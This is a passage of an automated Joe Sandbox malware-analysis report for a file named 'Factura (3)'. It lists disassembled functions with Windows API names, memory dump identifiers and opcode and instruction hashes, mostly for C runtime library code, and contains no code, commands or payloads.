                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 1e376d7e355807a299dc1e4ea43f404858888576f7abe951640601fec613157b
                                                      • Instruction ID: fec2c4eb0fc690ba5ad1fc199858061ee40caaf7baca4ce6bff54b971781c837
                                                      • Opcode Fuzzy Hash: 1e376d7e355807a299dc1e4ea43f404858888576f7abe951640601fec613157b
                                                      • Instruction Fuzzy Hash: 39B1CF32A0A79595E7689F2AC0D027CBBE0E705B48FA44175CF4D8B395CF7AD841E720
                                                      Function 00007FF7340FE600 Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32 ref: 00007FF7340FE6A5
                                                        • Part of subcall function 00007FF7340F8064: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7340F7EDE,?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F80B9
                                                        • Part of subcall function 00007FF7340F80DC: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7340E7683), ref: 00007FF7340F80F2
                                                        • Part of subcall function 00007FF7340F80DC: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7340E7683), ref: 00007FF7340F80FC
                                                        • Part of subcall function 00007FF734106658: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73410668B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3806578645-0
                                                      • Opcode ID: b0eba19c0229246ecea510389c34f08dfdaacf69a2237219b2b29313e3064350
                                                      • Instruction ID: a0aaf99cc58de1fe8dbd21076a1683f3ec00b880879174ac053f8e16bfcd36a6
                                                      • Opcode Fuzzy Hash: b0eba19c0229246ecea510389c34f08dfdaacf69a2237219b2b29313e3064350
                                                      • Instruction Fuzzy Hash: 7F41A832B0AB4351EB787E1368D1ABAE6C07F94B80F944175DE4D87785EF3CE401A660
                                                      Function 00007FF734101404 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: 94e524cedcc786df8c1a8e51e942637dcb9c41e3007b12fd57e7b35a2abd24cf
                                                      • Instruction ID: 73780728105cee947b755f3d31fb460738065314cc4afab190afff3c19cf68f9
                                                      • Opcode Fuzzy Hash: 94e524cedcc786df8c1a8e51e942637dcb9c41e3007b12fd57e7b35a2abd24cf
                                                      • Instruction Fuzzy Hash: CDB09220E07E02D2EA4C3F627C8621462A47F48700FE48138D00D82320EF2C20A96B21
                                                      Function 00007FF7340F12A8 Relevance: .3, Instructions: 327COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3693c4e2c2682b9ae62b9a94f6b37bee2a8ded189e110d81b9d653cce3838efa
                                                      • Instruction ID: d071787121793c93ccaa7d3866e881e0fb2c318e198a2fda1eca616ddc54313f
                                                      • Opcode Fuzzy Hash: 3693c4e2c2682b9ae62b9a94f6b37bee2a8ded189e110d81b9d653cce3838efa
                                                      • Instruction Fuzzy Hash: 91D1E722F0A642A5EB6CAE2BC0C027DA7E0EB45B48F944175CD4D8B6D5CF39EC45E760
                                                      Function 00007FF7340F5D9C Relevance: .3, Instructions: 309COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 4023145424-0
                                                      • Opcode ID: e817c1f1385653dba6650683b0498c80c37dc20bf52a2e74ecda746dddd9d547
                                                      • Instruction ID: 988ff28ed88cd45fd6060e145b00189593f645850c622354ff4d2c965bca31ca
                                                      • Opcode Fuzzy Hash: e817c1f1385653dba6650683b0498c80c37dc20bf52a2e74ecda746dddd9d547
                                                      • Instruction Fuzzy Hash: 8DC1E721B09682A5EB68AF6394C03BEA3E0FB84788F944071DE4DC7695EF3CD545E310
                                                      Function 00007FF7341031D8 Relevance: .3, Instructions: 271COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1500699246-0
                                                      • Opcode ID: 0d9fda558bca690ea2f6246b0f376b891cb47e7c835fc674064a83b1b053bfb6
                                                      • Instruction ID: d0186ba6bf92ed8e888f00c4542455739f771611923a2f7b0fe2576d3e61e29d
                                                      • Opcode Fuzzy Hash: 0d9fda558bca690ea2f6246b0f376b891cb47e7c835fc674064a83b1b053bfb6
                                                      • Instruction Fuzzy Hash: 7FB11832A08A4A52EB58FF22E4956B9B3A0FB44B88F904131DE5DC76C5DF3CE541E361
                                                      Function 00007FF7340F2850 Relevance: .2, Instructions: 207COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 7ab38b5f727dd2c2ce96b1bd3457ce05fffe7e3751355527b829c200c03d8502
                                                      • Instruction ID: 33fe4a2fcfa4d83f709e1f8cea704c264feec37ef3e400a5f9e769159755346a
                                                      • Opcode Fuzzy Hash: 7ab38b5f727dd2c2ce96b1bd3457ce05fffe7e3751355527b829c200c03d8502
                                                      • Instruction Fuzzy Hash: 6E81B132B06A0196EB68EE66D4C13BD73A0FB44B98F844636DE1E97784CF39D051D350
                                                      Function 00007FF7340FC53C Relevance: .2, Instructions: 198COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0eb4e8533c6bb52d196781b1d1c4afb2d3b997a0404573c056bdfa98b1109d3b
                                                      • Instruction ID: 5be3ffa386e0e62965b1914220d764bbc00f61be5e39d67731fc7da6b8356033
                                                      • Opcode Fuzzy Hash: 0eb4e8533c6bb52d196781b1d1c4afb2d3b997a0404573c056bdfa98b1109d3b
                                                      • Instruction Fuzzy Hash: 27810572B0D78156E768EF2A90C577AB6D0FB86794F904275DA8E83B85CF3CE0409B10
                                                      Function 00007FF73410680C Relevance: .2, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 924b6a24cd7c6e5a9cd060b49e21e23b268c2dfdbd5c325f5e50325fee44d6d6
                                                      • Instruction ID: 0e377b9da4a09f9fd49ae43aeb87ab42c78e793fdd578b00bb9bd1e201d099b5
                                                      • Opcode Fuzzy Hash: 924b6a24cd7c6e5a9cd060b49e21e23b268c2dfdbd5c325f5e50325fee44d6d6
                                                      • Instruction Fuzzy Hash: 84610E21F28A52A6F77CBD2664C8339E5C0AF40770FA54239D61DC7AE5DE3DE8006721
                                                      Function 00007FF7340F0554 Relevance: .1, Instructions: 145COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                      • Instruction ID: 351b2e20d380e21f0f78de79ce1a5499db190e5aa1c38c3e85f0ac21b944bf4f
                                                      • Opcode Fuzzy Hash: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                      • Instruction Fuzzy Hash: 2A51F736B1AA5192E7289F2AC1C0239B3E0EB85F58F644171CE8D97794CF3AE843D750
                                                      Function 00007FF7340F0758 Relevance: .1, Instructions: 145COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                      • Instruction ID: 36fbe6eaa940ecc5b8186da6eb7d3f4978971e4ff8f5fe182429df4584ba4688
                                                      • Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                      • Instruction Fuzzy Hash: FB51DB36F1AA5191E7289F26C1C073977E0EB44B58FA44171CE4C97794DB39E843D790
                                                      Function 00007FF7340F0350 Relevance: .1, Instructions: 145COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                      • Instruction ID: ff2f803cebfbdd7325efa9b47dd6c79dad259537fefe7690c129ea002e0bfcbe
                                                      • Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                      • Instruction Fuzzy Hash: 2C51E372B1A65192E7289F2AC1C023CB3E1EB45F58FA49171CE4C97795CB3AE882D750
                                                      Function 00007FF7340F4F04 Relevance: .1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 485612231-0
                                                      • Opcode ID: e2a5947eb8c4c22174c151913b5b229a940378c4d450c59a9dc1540948d98ab9
                                                      • Instruction ID: 16bb3e5f48f141bfeb52f7d965e5893f3c5d4b299c4eedd5dadeef763f0c7965
                                                      • Opcode Fuzzy Hash: e2a5947eb8c4c22174c151913b5b229a940378c4d450c59a9dc1540948d98ab9
                                                      • Instruction Fuzzy Hash: 9741E122714A5492EF48DF6BE994169E3E1BB48FD0B89A032EE4DC7B58DF3DD0429300
                                                      Function 00007FF7341093F0 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40f7506c87e0758fb76bfd811b94fde4e70e1ae10603e4d3fc8f46035ffc554a
                                                      • Instruction ID: f868fe4a85ea0d82ec8f6ae6c8349cdd2863796790b979c97c6d81df617ba41d
                                                      • Opcode Fuzzy Hash: 40f7506c87e0758fb76bfd811b94fde4e70e1ae10603e4d3fc8f46035ffc554a
                                                      • Instruction Fuzzy Hash: 6FF06271B296A59ADBA89F29F982629B7D0E71C380FD0803DD68DC3B04D63DD060EF14
                                                      Function 00007FF7340E809C Relevance: .0, Instructions: 2COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c54aaa6b33fa3a2383e2b137cb51f90187398938210ada2d17a6e77b658c6d6
                                                      • Instruction ID: 7cc173f4ef6a379514af46c025db45f653dffe55fd1cc58ea81d04eea43e330a
                                                      • Opcode Fuzzy Hash: 2c54aaa6b33fa3a2383e2b137cb51f90187398938210ada2d17a6e77b658c6d6
                                                      • Instruction Fuzzy Hash: 1DA00126A08D06E4E68CAF12A8D4560A220EB51301B9181B1C00D821A4EE2CA494E675
                                                      Function 00007FF7340DD860 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                      • String ID: bad locale name
                                                      • API String ID: 3904239083-1405518554
                                                      • Opcode ID: 51163696d9fc0694c2ea96a52036b76e57f0b1c2c46ca9daf6b20221859a4ab0
                                                      • Instruction ID: 1a086c6b27b09a0caa9201f9b4b8c2dcac0f17fea3e948f13548ea52eea47310
                                                      • Opcode Fuzzy Hash: 51163696d9fc0694c2ea96a52036b76e57f0b1c2c46ca9daf6b20221859a4ab0
                                                      • Instruction Fuzzy Hash: F8118F12F2EB8651DD08FB27A4C162EA360AF86780FC02471F94E53766CE2CD055A714
                                                      Function 00007FF7340EA270 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      • Opcode ID: 3b2fd6febbc48bf8445bc14dd4a2ac1d7ba01da1164da469ef2b6631e6b74ee6
                                                      • Instruction ID: 1228cac048b8de2b5158666381cfd398be17debf5fd704123432805a97e5f546
                                                      • Opcode Fuzzy Hash: 3b2fd6febbc48bf8445bc14dd4a2ac1d7ba01da1164da469ef2b6631e6b74ee6
                                                      • Instruction Fuzzy Hash: 1DD18532B08B459AEB18EF26D4802ADB7A0FB49798F400175EE8D97755CF38E4E1DB14
                                                      Function 00007FF7340F7078 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: f$p$p
                                                      • API String ID: 3215553584-1995029353
                                                      • Opcode ID: 473a47143e05af291c7410f6cbc9dece99c05f9ca639e9c118dffc461133c86f
                                                      • Instruction ID: c7ff4b9deabe14947eda665a928af72d10c876ab8fcdd88c4f88c01fcdeb4045
                                                      • Opcode Fuzzy Hash: 473a47143e05af291c7410f6cbc9dece99c05f9ca639e9c118dffc461133c86f
                                                      • Instruction Fuzzy Hash: E612A221B0E143A6FB68BE26D0D46B9F6E1FB40750FD44075E699876C4DF3CE480AB62
                                                      Function 00007FF7340DB320 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 377COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Mpunct$ctypestd::ios_base::width
                                                      • String ID: @
